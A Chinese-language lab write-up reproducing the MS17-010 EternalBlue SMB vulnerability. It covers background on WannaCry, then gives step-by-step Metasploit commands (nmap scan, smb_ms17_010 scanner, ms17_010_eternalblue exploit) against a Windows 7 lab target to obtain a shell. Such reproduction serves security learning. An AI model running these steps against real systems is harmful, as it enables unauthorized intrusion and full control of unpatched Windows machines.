ms17-010---永恒之蓝

简介：

永恒之蓝（Eternal Blue）爆发于2017年4月14日晚，是一种利用Windows系统的SMB协议来获取系统的最高权限，以此来控制计算机。

甚至于2017年5月12日， 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，使全世界大范围内遭受了该勒索病毒，甚至波及到学校、大型企业、政府等机构，只能通过支付高额的赎金才能恢复出文件。

不过在该病毒出来不久就被微软通过打补丁修复。

SMB协议：SMB（全称是Server Message Block）是一个协议服务器信息块，它是一种客户机/服务器、请求/响应协议，通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源，电脑上的网上邻居就是靠SMB实现的；SMB协议工作在应用层和会话层，可以用在TCP/IP协议之上，SMB使用TCP139端口和TCP445端口。

复现

攻击者：Linux kali2021.2 （192.168.174.130）
靶机：windows 7 enterprise（192.168.174.132）

过程

1、发现主机

nmap 192.168.174.0/24

这里可以看到445端口是开放的，而永恒之蓝就是利用这个端口的445端口的SMB服务。

2、使用msf的永恒之蓝模块

打开msf：

搜索相关的工具：

search ms17_010

3、使用ms_17-010的扫描模块，对靶机进行扫描：

使用模块：

use auxiliary/scanner/smb/smb_ms17_010 

设置目标IP或网段：

set rhosts 192.168.174.132

执行扫描：

run

4、使用ms17_010模块，执行

使用模块：

 use exploit/windows/smb/ms17_010_eternalblue

设置攻击IP：

set rhosts 192.168.174.132

这里可以使用show options查看设置选项

执行：

exploit 或者 run

5、得到shell靶机

输入shell就可以得到shell靶机了
输入：chcp 65001解决乱码问题
到这里就已经成功了，可以通过cmd进行操作了

复现完成！